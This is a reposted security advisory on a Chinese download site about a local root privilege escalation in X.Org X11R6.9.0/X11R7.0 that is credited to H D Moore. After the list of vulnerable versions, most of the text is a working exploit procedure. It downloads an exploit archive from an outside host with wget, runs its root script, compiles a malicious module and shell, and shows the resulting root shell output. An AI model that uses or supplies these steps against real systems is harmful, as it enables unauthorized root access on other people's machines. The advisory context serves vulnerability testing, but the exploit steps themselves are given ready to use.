 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
"The X.Org Foundation provides an open source implementation of the X Window System." A privileges escalation with in X.org allows attackers to gain root privileges, the following exploit code can be used to test your system for the mentioned vulnerability. Credit: The information has been provided by H D Moore. The original article can be found at: http://www.milw0rm.org/exploits/1596 Details Vulnerable Systems: * xorg-server version 1.0.0, as shipped with X11R7.0 * xorg-server version X11R7.0rc * xorg-server version X11R6.9.0 * xorg-server version X11R6.9.0rc * xorg-server version X11R6.8.2 * xorg-server version X11R6.8.2rc Exploit: # From Daniel Stone's Advisory # xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates # of X11R7.0, is vulnerable. # X11R6.9.0, and all release candidates, are vulnerable. # X11R6.8.2 and earlier versions are not vulnerable. # The rest is H D Moore from metasploit Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell *.o *.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c X Window System Version 7.0.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 7.0 [ snip ] r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... # backup: http://www.milw0rm.com/sploits/xmodulepath.tgz # milw0rm.com [2006-03-20] |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)